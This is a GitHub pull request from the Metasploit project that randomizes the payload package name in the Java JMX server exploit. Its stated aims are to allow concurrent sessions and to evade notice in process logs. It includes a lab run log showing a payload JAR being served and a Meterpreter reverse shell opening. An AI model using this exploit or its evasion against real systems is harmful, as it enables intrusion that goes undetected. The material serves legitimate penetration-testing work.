
Java JMX Package Name Randomization #9896

Merged
merged 1 commit into from
Jul 2, 2018

Conversation

sgorbaty

@sgorbaty sgorbaty commented Apr 19, 2018

This change randomizes the MBean package name inside the jar.

This achieves two goals:

A. Most importantly, this allows multiple sessions from the same exploit to work at once. This is needed if the attacker's IP has changed or there is a collaborator attempting to get a shell.
Previously, without package name randomization, the exploit would fail because the IP address is packaged within the JAR and, once loaded by the JVM, would not be reloaded again, since the package + class combo is already loaded.

B. This allows the payload to be a little more stealthy and not stand out like a sore thumb in the process logs.

@wchen-r7
Contributor

wchen-r7 commented Jul 2, 2018

Works for me:

msf5 exploit(multi/misc/java_jmx_server) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.141:1617 - Using URL: http://0.0.0.0:8080/pFtEoN
[*] 172.16.249.141:1617 - Local IP: http://x.x.x.x:8080/pFtEoN
[*] 172.16.249.141:1617 - Sending RMI Header...
[*] 172.16.249.141:1617 - Discovering the JMXRMI endpoint...
[+] 172.16.249.141:1617 - JMXRMI endpoint on 172.16.249.141:49212
[*] 172.16.249.141:1617 - Proceeding with handshake...
[+] 172.16.249.141:1617 - Handshake with JMX MBean server on 172.16.249.141:49212
[*] 172.16.249.141:1617 - Loading payload...
[*] 172.16.249.141:1617 - Replied to request for mlet
[*] 172.16.249.141:1617 - Replied to request for payload JAR
[*] 172.16.249.141:1617 - Executing payload...
[*] Sending stage (53859 bytes) to 172.16.249.141
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.141:49221) at 2018-07-02 13:38:48 -0500

meterpreter >

@wchen-r7 wchen-r7 merged commit fb38572 into rapid7:master Jul 2, 2018
wchen-r7 added a commit that referenced this pull request Jul 2, 2018
@wchen-r7
Contributor

wchen-r7 commented Jul 2, 2018

Release Notes

This improves evasion for exploits/multi/misc/java_jmx_server by randomizing the package name.

msjenkins-r7 pushed a commit that referenced this pull request Jul 2, 2018
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Jul 5, 2018